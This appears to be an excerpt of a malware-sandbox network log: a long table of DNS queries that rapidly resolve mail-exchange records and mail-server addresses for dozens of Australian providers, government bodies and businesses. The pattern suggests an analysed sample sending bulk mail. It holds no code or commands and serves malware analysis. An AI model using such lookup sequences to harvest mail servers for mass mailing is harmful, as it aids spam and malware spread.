                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.586535931 CET8.8.8.8192.168.2.30x6fceNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.598599911 CET8.8.8.8192.168.2.30x3117No error (0)chubb-com-au.mail.protection.outlook.com104.47.20.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.673903942 CET8.8.8.8192.168.2.30xa2e9Name error (3)cap.tas.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.747081995 CET8.8.8.8192.168.2.30x6751No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.815036058 CET8.8.8.8192.168.2.30xef34No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.997864008 CET8.8.8.8192.168.2.30x9aefNo error (0)vu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.997864008 CET8.8.8.8192.168.2.30x9aefNo error (0)vu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.022156000 CET8.8.8.8192.168.2.30xc3a9No error (0)mx2.hc676-53.ap.iphmx.com23.90.107.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.022156000 CET8.8.8.8192.168.2.30xc3a9No error (0)mx2.hc676-53.ap.iphmx.com207.54.75.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.028465986 CET8.8.8.8192.168.2.30x9b9bNo error (0)hornsby.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.059849024 CET8.8.8.8192.168.2.30x4cbaNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.059849024 CET8.8.8.8192.168.2.30x4cbaNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.077106953 CET8.8.8.8192.168.2.30x63bcNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.077106953 CET8.8.8.8192.168.2.30x63bcNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.077106953 CET8.8.8.8192.168.2.30x63bcNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.168039083 CET8.8.8.8192.168.2.30xc786No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.179781914 CET8.8.8.8192.168.2.30xd1cfNo error (0)hornsby-nsw-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.179781914 CET8.8.8.8192.168.2.30xd1cfNo error (0)hornsby-nsw-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.250866890 CET8.8.8.8192.168.2.30xd075No error (0)act.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.286426067 CET8.8.8.8192.168.2.30xc354No error (0)act-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.286426067 CET8.8.8.8192.168.2.30xc354No error (0)act-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.340774059 CET8.8.8.8192.168.2.30x532eNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.362612009 CET8.8.8.8192.168.2.30x9ea6No error (0)creativeelements.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.369683981 CET8.8.8.8192.168.2.30x1b15No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.369683981 CET8.8.8.8192.168.2.30x1b15No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.398010015 CET8.8.8.8192.168.2.30xc20aNo error (0)creativeelements-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.398010015 CET8.8.8.8192.168.2.30xc20aNo error (0)creativeelements-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.612709999 CET8.8.8.8192.168.2.30xfc7bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.612709999 CET8.8.8.8192.168.2.30xfc7bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.612709999 CET8.8.8.8192.168.2.30xfc7bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.750823975 CET8.8.8.8192.168.2.30x7ac4No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.750823975 CET8.8.8.8192.168.2.30x7ac4No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.751961946 CET8.8.8.8192.168.2.30x43a4No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.779828072 CET8.8.8.8192.168.2.30xfef0No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.824891090 CET8.8.8.8192.168.2.30xab0eNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.902120113 CET8.8.8.8192.168.2.30xf465No error (0)dingoblue.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.902120113 CET8.8.8.8192.168.2.30xf465No error (0)dingoblue.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.912455082 CET8.8.8.8192.168.2.30x45f4No error (0)theforce.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.912455082 CET8.8.8.8192.168.2.30x45f4No error (0)theforce.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.912455082 CET8.8.8.8192.168.2.30x45f4No error (0)theforce.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.953685999 CET8.8.8.8192.168.2.30xeab6No error (0)mx-2.planetozi.com.au202.22.162.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.971122026 CET8.8.8.8192.168.2.30x587cNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.993516922 CET8.8.8.8192.168.2.30x5c7cNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.036031961 CET8.8.8.8192.168.2.30xcb9cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.036031961 CET8.8.8.8192.168.2.30xcb9cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.036031961 CET8.8.8.8192.168.2.30xcb9cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.056399107 CET8.8.8.8192.168.2.30xb509No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.128685951 CET8.8.8.8192.168.2.30x5f6bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.128685951 CET8.8.8.8192.168.2.30x5f6bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.128685951 CET8.8.8.8192.168.2.30x5f6bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.147130966 CET8.8.8.8192.168.2.30x25deNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.147130966 CET8.8.8.8192.168.2.30x25deNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.148113966 CET8.8.8.8192.168.2.30x995cNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.224241018 CET8.8.8.8192.168.2.30x1917No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.245529890 CET8.8.8.8192.168.2.30xc2afNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.282566071 CET8.8.8.8192.168.2.30x23a8No error (0)transmin.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.312014103 CET8.8.8.8192.168.2.30xf392No error (0)transmin-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.312014103 CET8.8.8.8192.168.2.30xf392No error (0)transmin-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.336416960 CET8.8.8.8192.168.2.30x96f2No error (0)mail.theforce.com.au203.18.20.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.532217979 CET8.8.8.8192.168.2.30xec11No error (0)hockingstuart.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.567318916 CET8.8.8.8192.168.2.30x49e4No error (0)hockingstuart-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.567318916 CET8.8.8.8192.168.2.30x49e4No error (0)hockingstuart-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.613960028 CET8.8.8.8192.168.2.30xe2e4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.613960028 CET8.8.8.8192.168.2.30xe2e4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.613960028 CET8.8.8.8192.168.2.30xe2e4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.632175922 CET8.8.8.8192.168.2.30x755No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.645673037 CET8.8.8.8192.168.2.30xe95cNo error (0)optusnet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.664139032 CET8.8.8.8192.168.2.30x39e6No error (0)mail2.optusnet.com.au211.29.132.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.693728924 CET8.8.8.8192.168.2.30xe4e5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.693728924 CET8.8.8.8192.168.2.30xe4e5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.693728924 CET8.8.8.8192.168.2.30xe4e5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.716510057 CET8.8.8.8192.168.2.30x41eeNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.959955931 CET8.8.8.8192.168.2.30xf54aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.959955931 CET8.8.8.8192.168.2.30xf54aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.959955931 CET8.8.8.8192.168.2.30xf54aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.972515106 CET8.8.8.8192.168.2.30x50f1Name error (3)bmcl.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.051388025 CET8.8.8.8192.168.2.30xf1d5No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.091819048 CET8.8.8.8192.168.2.30x2c65No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.091819048 CET8.8.8.8192.168.2.30x2c65No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.091819048 CET8.8.8.8192.168.2.30x2c65No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.091819048 CET8.8.8.8192.168.2.30x2c65No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.091819048 CET8.8.8.8192.168.2.30x2c65No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.395915031 CET8.8.8.8192.168.2.30xd83cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.395915031 CET8.8.8.8192.168.2.30xd83cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.395915031 CET8.8.8.8192.168.2.30xd83cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.403512955 CET8.8.8.8192.168.2.30x94e8No error (0)alt3.aspmx.l.google.com142.251.8.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.417030096 CET8.8.8.8192.168.2.30xbb82No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.521267891 CET8.8.8.8192.168.2.30xdaecNo error (0)aflpa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.664203882 CET8.8.8.8192.168.2.30x3953No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.664203882 CET8.8.8.8192.168.2.30x3953No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.664203882 CET8.8.8.8192.168.2.30x3953No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
